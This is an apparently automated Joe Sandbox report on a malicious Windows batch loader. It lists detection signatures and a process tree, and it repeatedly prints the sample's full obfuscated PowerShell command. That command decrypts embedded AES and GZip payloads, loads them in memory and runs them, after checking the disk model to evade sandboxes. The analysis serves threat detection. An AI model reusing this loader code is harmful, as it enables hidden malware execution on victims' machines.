Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Hydra.ccLoader.bat

Overview

General Information

Sample name:Hydra.ccLoader.bat
Analysis ID:1573922
MD5:98347650099e648660cec15b17dbd5c0
SHA1:c3162c64614f82d20587a1c0a2753c8b616884b7
SHA256:39fa01d351c5cdb6de9c4155f0c7d4241578ea02e5fc735c19faae312487dc20
Tags:batuser-smica83
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Found large BAT file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Powershell drops PE file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Suspicious command line found
Suspicious powershell command line found
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 6008 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Hydra.ccLoader.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 3588 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • findstr.exe (PID: 4348 cmdline: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 6892 cmdline: cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$iUuMH);'.Replace('*', ''); Invoke-Expression '$yWDGv=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$RiWlb=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($jKyNf, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $RiWlb.CopyTo($yWDGv); $RiWlb.Dispose(); $jKyNf.Dispose(); $yWDGv.Dispose(); $yWDGv.ToArray();}function Kbrbr($iUuMH,$wjUzC){ Invoke-Expression '$VDuEP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$iUuMH);'.Replace('*', ''); Invoke-Expression '$nGmNE=$VDuEP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$nGmNE.*I*n*v*o*k*e*($null, $wjUzC);'.Replace('*', '');}$XtHlN = 'C:\Users\user\Desktop\Hydra.ccLoader.bat';$host.UI.RawUI.WindowTitle = $XtHlN;$pkwbz=[System.IO.File]::ReadAllText($XtHlN).Split([Environment]::NewLine);foreach ($GxnwH in $pkwbz) { if ($GxnwH.StartsWith('VEYmI')) { $jXznR=$GxnwH.Substring(5); break; }}$ELwUb=[string[]]$jXznR.Split('\');Invoke-Expression '$muS = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Ray = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Acu = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Kbrbr $muS $null;Kbrbr $Ray $null;Kbrbr $Acu (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 2344 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
      • dllhost.exe (PID: 6140 cmdline: C:\Windows\System32\dllhost.exe /Processid:{a7d7aefc-34fa-4c44-83e0-dba733732ecf} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
        • winlogon.exe (PID: 556 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
          • dllhost.exe (PID: 2044 cmdline: C:\Windows\System32\dllhost.exe /Processid:{d7046f2c-bae2-4413-95a8-3c99656fab22} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
            • svchost.exe (PID: 1872 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 2096 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • spoolsv.exe (PID: 2216 cmdline: C:\Windows\System32\spoolsv.exe MD5: 0D4B1E3E4488E9BDC035F23E1F4FE22F)
        • lsass.exe (PID: 632 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
          • svchost.exe (PID: 2524 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 912 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • dwm.exe (PID: 976 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
        • svchost.exe (PID: 356 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 704 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 932 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1044 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1064 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1080 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1188 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1212 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1344 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1376 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1388 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1400 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1436 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1520 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1636 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1668 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1752 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1760 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1804 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1852 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1952 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1976 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1992 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1736 cmdline: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • cmd.exe (PID: 4016 cmdline: "C:\Windows\System32\cmd.exe" /C type C:\Users\user\Desktop\Hydra.ccLoader.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1732 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 2156 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • findstr.exe (PID: 1268 cmdline: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
        • cmd.exe (PID: 2104 cmdline: cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$iUuMH);'.Replace('*', ''); Invoke-Expression '$yWDGv=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$RiWlb=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($jKyNf, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $RiWlb.CopyTo($yWDGv); $RiWlb.Dispose(); $jKyNf.Dispose(); $yWDGv.Dispose(); $yWDGv.ToArray();}function Kbrbr($iUuMH,$wjUzC){ Invoke-Expression '$VDuEP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$iUuMH);'.Replace('*', ''); Invoke-Expression '$nGmNE=$VDuEP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$nGmNE.*I*n*v*o*k*e*($null, $wjUzC);'.Replace('*', '');}$XtHlN = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $XtHlN;$pkwbz=[System.IO.File]::ReadAllText($XtHlN).Split([Environment]::NewLine);foreach ($GxnwH in $pkwbz) { if ($GxnwH.StartsWith('VEYmI')) { $jXznR=$GxnwH.Substring(5); break; }}$ELwUb=[string[]]$jXznR.Split('\');Invoke-Expression '$muS = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Ray = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Acu = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Kbrbr $muS $null;Kbrbr $Ray $null;Kbrbr $Acu (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 4412 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 4412INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x40aff6:$b2: ::FromBase64String(
  • 0x4c0631:$b2: ::FromBase64String(
  • 0x4c068f:$b2: ::FromBase64String(
  • 0x530521:$b2: ::FromBase64String(
  • 0x530fcd:$b2: ::FromBase64String(
  • 0x31f452:$s1: -join
  • 0x32b487:$s1: -join
  • 0x4ba899:$s1: -join
  • 0x4bd147:$s3: Reverse
  • 0x616e4a:$s3: Reverse
  • 0x3209f0:$s4: +=
  • 0x3231e1:$s4: +=
  • 0x323260:$s4: +=
  • 0x32347b:$s4: +=
  • 0x3234fe:$s4: +=
  • 0x323f58:$s4: +=
  • 0x324351:$s4: +=
  • 0x327d52:$s4: +=
  • 0x327d71:$s4: +=
  • 0x327dac:$s4: +=
  • 0x327dc9:$s4: +=

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$iUuMH);'.Replace('*', ''); Invoke-Expression '$yWDGv=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$RiWlb=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($jKyNf, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $RiWlb.CopyTo($yWDGv); $RiWlb.Dispose(); $jKyNf.Dispose(); $yWDGv.Dispose(); $yWDGv.ToArray();}function Kbrbr($iUuMH,$wjUzC){ Invoke-Expression '$VDuEP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$iUuMH);'.Replace('*', ''); Invoke-Expression '$nGmNE=$VDuEP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$nGmNE.*I*n*v*o*k*e*($null, $wjUzC);'.Replace('*', '');}$XtHlN = 'C:\Users\user\Desktop\Hydra.ccLoader.bat';$host.UI.RawUI.WindowTitle = $XtHlN;$pkwbz=[System.IO.File]::ReadAllText($XtHlN).Split([Environment]::NewLine);foreach ($GxnwH in $pkwbz) { if ($GxnwH.StartsWith('VEYmI')) { $jXznR=$GxnwH.Substring(5); break; }}$ELwUb=[string[]]$jXznR.Split('\');Invoke-Expression '$muS = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Ray = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Acu = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Kbrbr $muS $null;Kbrbr $Ray $null;Kbrbr $Acu (,[string[]] ('')); , CommandLine: cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$iUuMH);'.Replace('*', ''); Invoke-Expression '$yWDGv=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$RiWlb=New-Obj
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$iUuMH);'.Replace('*', ''); Invoke-Expression '$yWDGv=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$RiWlb=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($jKyNf, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $RiWlb.CopyTo($yWDGv); $RiWlb.Dispose(); $jKyNf.Dispose(); $yWDGv.Dispose(); $yWDGv.ToArray();}function Kbrbr($iUuMH,$wjUzC){ Invoke-Expression '$VDuEP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$iUuMH);'.Replace('*', ''); Invoke-Expression '$nGmNE=$VDuEP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$nGmNE.*I*n*v*o*k*e*($null, $wjUzC);'.Replace('*', '');}$XtHlN = 'C:\Users\user\Desktop\Hydra.ccLoader.bat';$host.UI.RawUI.WindowTitle = $XtHlN;$pkwbz=[System.IO.File]::ReadAllText($XtHlN).Split([Environment]::NewLine);foreach ($GxnwH in $pkwbz) { if ($GxnwH.StartsWith('VEYmI')) { $jXznR=$GxnwH.Substring(5); break; }}$ELwUb=[string[]]$jXznR.Split('\');Invoke-Expression '$muS = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Ray = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Acu = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Kbrbr $muS $null;Kbrbr $Ray $null;Kbrbr $Acu (,[string[]] ('')); , CommandLine: cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$iUuMH);'.Replace('*', ''); Invoke-Expression '$yWDGv=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$RiWlb=New-Obj
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$iUuMH);'.Replace('*', ''); Invoke-Expression '$yWDGv=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$RiWlb=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($jKyNf, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $RiWlb.CopyTo($yWDGv); $RiWlb.Dispose(); $jKyNf.Dispose(); $yWDGv.Dispose(); $yWDGv.ToArray();}function Kbrbr($iUuMH,$wjUzC){ Invoke-Expression '$VDuEP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$iUuMH);'.Replace('*', ''); Invoke-Expression '$nGmNE=$VDuEP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$nGmNE.*I*n*v*o*k*e*($null, $wjUzC);'.Replace('*', '');}$XtHlN = 'C:\Users\user\Desktop\Hydra.ccLoader.bat';$host.UI.RawUI.WindowTitle = $XtHlN;$pkwbz=[System.IO.File]::ReadAllText($XtHlN).Split([Environment]::NewLine);foreach ($GxnwH in $pkwbz) { if ($GxnwH.StartsWith('VEYmI')) { $jXznR=$GxnwH.Substring(5); break; }}$ELwUb=[string[]]$jXznR.Split('\');Invoke-Expression '$muS = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Ray = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Acu = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Kbrbr $muS $null;Kbrbr $Ray $null;Kbrbr $Acu (,[string[]] ('')); , CommandLine: cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); 